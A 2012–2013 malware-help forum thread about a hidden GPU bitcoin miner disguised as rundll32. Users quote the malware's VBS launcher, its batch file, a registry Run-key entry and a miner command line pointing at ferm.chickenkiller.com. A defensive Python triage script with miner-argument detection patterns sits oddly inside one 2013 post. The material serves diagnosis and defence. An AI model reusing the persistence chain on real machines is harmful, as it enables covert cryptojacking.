When gaming display locks up, pc makes sound - also found this - phatk110722GeForce starting rundll32


3 replies to this topic

#1 figueroa4

figueroa4

  • Members
  • 14 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:52 PM

Posted 16 December 2012 - 04:57 PM

This is my son's computer. He has Fallout New Vegas on it and recently when he plays it for a while the display pixelates? and freezes, the pc itself makes a strange sound and we have to manually turn off the pc for a bit. He noticed that when he turns it back on the rundll32 is running at over 70% before doing anything. I looked up and found out about Process Explorer which shows this for the rundll32:

rundll32.exe -k phatk -o http://ferm.chickenkiller.com:80 -u ferm1 -p 12345 -I 1

He has avast! Antivirus scanner and I am currently running that and Malwarebytes to run after.

Windows 7 64 bit(desktop pc)
4gb ram
3 ghz AMD cpu

Thanks!



#2 qwynbleid

qwynbleid

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:52 AM

Posted 03 January 2013 - 05:48 PM

Greetings,

Firstly, I would like to ask, did you find anything and if so, what?
Then unfortunately I seem to be experiencing the exact same problem as you and I did do a little manual digging which resulted in the following knowledge:

The program has added itself to the start up of the system, under msconfig, startup, look for
Startup item: Adobe; Manufacturer: Unknown; Command: c:\programdata\adob\color.vbs (un-marking it may yield results with it not starting at least but I am not sure if there are other safeguards in place)

Now OBVIOUSLY this has nothing to do with Adobe, especially since I don't have any product of theirs, not even the Flash Player, and besides the real Adobe folder would be c:\programdata\Adobe, checked on a friend's PC.

That color.vbs is a visual basic script file and peering inside reveals it does the following:

Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\ProgramData\adob\start.bat", 0, false

Which translates to running start.bat in that folder if I'm not mistaken, then the code in the bat file is:

regedit.exe /s 123.reg
ping 127.0.0.1 -n 60
CD C:/ProgramData/adob
rundll32.exe -k phatk -o http://ferm.chickenkiller.com:80 -u ferm1 -p 12345 -I 1

so it opens up Windows' registry editor and adds (after looking in the mentioned registry file)

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe"="C:\\ProgramData\\adob\\color.vbs"

It then proceeds to ping your localhost 60 times, why? Who knows.
("127.0.0.1 is the loopback Internet protocol (IP) address also referred to as the “localhost.” The loopback construct gives a computer or device capable of networking the capability to validate or establish the IP stack on the machine.")

then it changes the directory it is working in to C:/ProgramData/adob and proceeds to run a custom rundll32.exe (from that directory). Note, this is NOT the rundll Windows uses; Windows uses the one in the System32 folder, although that one can also become infected of course. IF and how this exe file was customized remains a hexadecimal mystery, that is because I can only view the code in hexadecimal and from that I can't really tell you anything at all.

If I remember correctly the base use of rundll32 is to, well, run dll files, which of course each contain programming code of their own. The 3 dll files in this specific folder are
libcurl-4.dll
libpdcurses.dll
libpthread-2.dll

also present are 2 bin files,

phatk110722GeForce GTX 580v1w256long4.bin
phatk110722Redwoodbitalignv2w128long4.bin

and

phatk110722.cl
poclbm110717.cl

now phatk110722GeForce GTX 580v1w256long4.bin will most definitely differ from PC to PC because it names the GPU currently in the machine (at least for me it does)

Sigh, now Poclbm (PyOpenCL bitcoin miner) is a python GPU bitcoin miner that uses the OpenCL framework to quickly perform the hashing computations. Works with AMD - 4xxx and up, Nvidia - 8xxx and up, video cards.

But this is not what we are dealing with, this guy is simply using code from the open source project to do hashing computations? on our gpu's? If I were to take an extremely wild guess here that is. Some PC's might not really be all that affected then as some GPU's aren't supported. But I digress. I am a bit tired will probably look into it further tomorrow.

Also terminating the rundll32.exe process that is eating up our CPUs and perhaps GPUs seems to stop the problem until you restart (but removing it from startup in msconfig should fix that; regardless, this might just be the tip of the iceberg and as such I need to know more about what this thing is actually doing, for the sake of my sanity).

Edited by qwynbleid, 03 January 2013 - 05:54 PM.
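The chain qwynbleid reconstructed above (Run key -> color.vbs -> start.bat -> a renamed binary called rundll32.exe with miner-style arguments) can be checked from copies of the files without running anything on the infected box. The Python below is an added example written for this thread, not the poster's code and not part of the miner; it parses a .reg export and a launcher batch file, and classifies a process named rundll32.exe by where it was loaded from and what its arguments look like. The two SAMPLE_* strings are constructed from what the thread quotes; the "SecurityHealth" entry and the legitimate shell32 invocation are made-up benign controls. The checks are heuristics: the genuine rundll32 is always invoked as rundll32.exe <dll>,<EntryPoint>, so a process under that name whose arguments are pool-miner switches (-o <url> -u <user> -p <pass>) is by definition something else.

```python
"""Offline triage for the Run-key -> .vbs -> .bat -> fake rundll32 chain (added example)."""
import re
from pathlib import PureWindowsPath

# Constructed sample of an exported Run key, shaped like the 123.reg quoted in the thread.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe"="C:\\ProgramData\\adob\\color.vbs"
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
'''

# Constructed copy of the start.bat contents as quoted in the thread.
SAMPLE_BAT = r'''regedit.exe /s 123.reg
ping 127.0.0.1 -n 60
CD C:/ProgramData/adob
rundll32.exe -k phatk -o http://ferm.chickenkiller.com:80 -u ferm1 -p 12345 -I 1
'''

SCRIPT_EXTS = {".vbs", ".bat", ".cmd", ".js", ".ps1", ".wsf"}
USER_WRITABLE_ROOTS = ("c:\\programdata", "c:\\users\\")
RUNDLL32_LEGIT_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# pool-miner style switches: -o <scheme>://<host> ... -u <worker>
MINER_ARGS = re.compile(r"\s-o\s+\S+://\S+.*\s-u\s+\S+", re.IGNORECASE)


def parse_run_entries(reg_text):
    """Return {value_name: command} for every value under a ...\\Run or ...\\RunOnce key."""
    entries, in_run_key = {}, False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_run_key = line.lower().rstrip("]").endswith(("\\run", "\\runonce"))
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if in_run_key and m:
            # .reg files escape backslashes and quotes; undo that
            entries[m.group(1)] = m.group(2).replace("\\\\", "\\").replace('\\"', '"')
    return entries


def flag_run_entry(name, command):
    """List reasons an autorun value deserves a look; empty list means nothing stood out."""
    reasons = []
    target = command.strip().strip('"')
    low = target.lower()
    if PureWindowsPath(low).suffix in SCRIPT_EXTS:
        reasons.append("autorun launches a script interpreter file")
    if low.startswith(USER_WRITABLE_ROOTS):
        reasons.append("target lives in a user-writable location")
    # cheap look-alike check: value name 'Adobe' but the folder is 'adob'
    folders = [p.lower() for p in PureWindowsPath(target).parts[1:-1]]
    n = name.lower()
    if n not in folders and any(p[:4] == n[:4] and p != n for p in folders):
        reasons.append(f"value name '{name}' resembles but does not match its folder name")
    return reasons


def analyse_batch(bat_text):
    """Summarise a launcher batch file: registry imports, loopback-ping delay, rundll32 launches."""
    summary = {"reg_imports": [], "delay_seconds": 0, "launches": []}
    for raw in bat_text.splitlines():
        line = raw.strip()
        low = line.lower()
        if low.startswith("regedit") and "/s" in low:
            summary["reg_imports"].append(line.split()[-1])
        m = re.match(r"ping\s+127\.0\.0\.1\s+-n\s+(\d+)", low)
        if m:
            # N pings to loopback with a one-second gap is a crude sleep of about N-1 seconds
            summary["delay_seconds"] += max(int(m.group(1)) - 1, 0)
        if "rundll32" in low:
            summary["launches"].append(line)
    return summary


def classify_rundll32(image_path, cmdline):
    """Explain why a process called rundll32.exe does not look like the Windows one."""
    reasons = []
    if not image_path.lower().startswith(RUNDLL32_LEGIT_DIRS):
        reasons.append("image not loaded from System32/SysWOW64")
    parts = cmdline.strip().split(None, 1)
    args = parts[1] if len(parts) > 1 else ""
    # real rundll32 syntax is  <dll>,<EntryPoint> [optional arguments]
    if not re.match(r'^"?[^",]+"?\s*,\s*\w+', args):
        reasons.append("arguments are not of the form <dll>,<EntryPoint>")
    if MINER_ARGS.search(cmdline):
        reasons.append("arguments look like a pool miner (-o <url> -u <user>)")
    return reasons


if __name__ == "__main__":
    for name, cmd in parse_run_entries(SAMPLE_REG).items():
        print(name, "->", cmd, flag_run_entry(name, cmd) or "ok")
    print(analyse_batch(SAMPLE_BAT))
    print(classify_rundll32(r"C:\ProgramData\adob\rundll32.exe",
                            SAMPLE_BAT.splitlines()[-1]))
```

Run it against an exported copy of the Run key and the batch file rather than on the live system; the "delay_seconds" figure is the same ping trick the post describes, and the three reasons returned for the fake rundll32 (wrong directory, no dll,entry pair, miner switches) are what a defender would put in a detection rule.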


#3 qwynbleid

qwynbleid

  • Members
  • 2 posts
  • OFFLINE
  •  
  • Local time:12:52 AM

Posted 03 January 2013 - 05:56 PM

Additionally any help from anybody would be appreciated, thank you.

Also running
Windows 7 professional(With latest updates so :/)
GTX 580
i7 950 (from the old lga 1366 architecture)
6gb ram

Edited by qwynbleid, 03 January 2013 - 05:59 PM.


#4 boopme

boopme

    To Insanity and Beyond


  • Global Moderator
  • 73,493 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:NJ USA
  • Local time:06:52 PM

Posted 04 January 2013 - 02:30 PM

Hello, it looks like a malware file, so I suggest running these next.


I'd like us to scan your machine with ESET OnlineScan
  • Hold down Control and click on this link to open ESET OnlineScan in a new window.
  • Click the button shown.
  • For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    • Click on esetsmartinstaller_enu.exe to download the ESET Smart Installer. Save it to your desktop.
    • Double click on the icon on your desktop.
  • Check "YES, I accept the Terms of Use."
  • Click the Start button.
  • Accept any security warnings from your browser.
  • Under scan settings, check "Scan Archives" and "Remove found threats"
  • Click Advanced settings and select the following:
    • Scan potentially unwanted applications
    • Scan for potentially unsafe applications
    • Enable Anti-Stealth technology
  • ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  • When the scan completes, click List Threats
  • Click Export, and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  • Click the Back button.
  • Click the Finish button.

NOTE:Sometimes if ESET finds no infections it will not create a log.




Running GMER on 32 and 64 bit Systems

--------------------

Please download GMER from one of the following locations and save it to your desktop:

  • Main Mirror which will download a randomly named file
  • Zipped Mirror - Unzip the file to its own folder such as C:\gmer
  • Disconnect from the Internet and close all running programs
  • Temporarily disable any real-time active protection
  • It is very important you do not use your computer while GMER is running
  • Double-click on the randomly named GMER icon
  • GMER will open to the Rootkit/Malware tab and perform an automatic quick scan
  • If you receive a warning about rootkit activity and are asked to fully scan your system click NO
  • Please check in the Quick scan box
  • Please uncheck the following:
    • IAT/EAT
    • Show All <<< Important
  • Click Scan
  • If you see a rootkit warning window click OK
  • When the scan is finished, Save the results to your desktop as gmer.log
  • Click Copy then paste the results in your reply
  • Exit GMER and be sure to re-enable your Antivirus, Firewall and any other security programs you had disabled
Note:
  • If you encounter any problems, try running GMER in Safe Mode
  • If GMER crashes or keeps resulting in a Blue Screen of Death, uncheck Devices on the right side before scanning




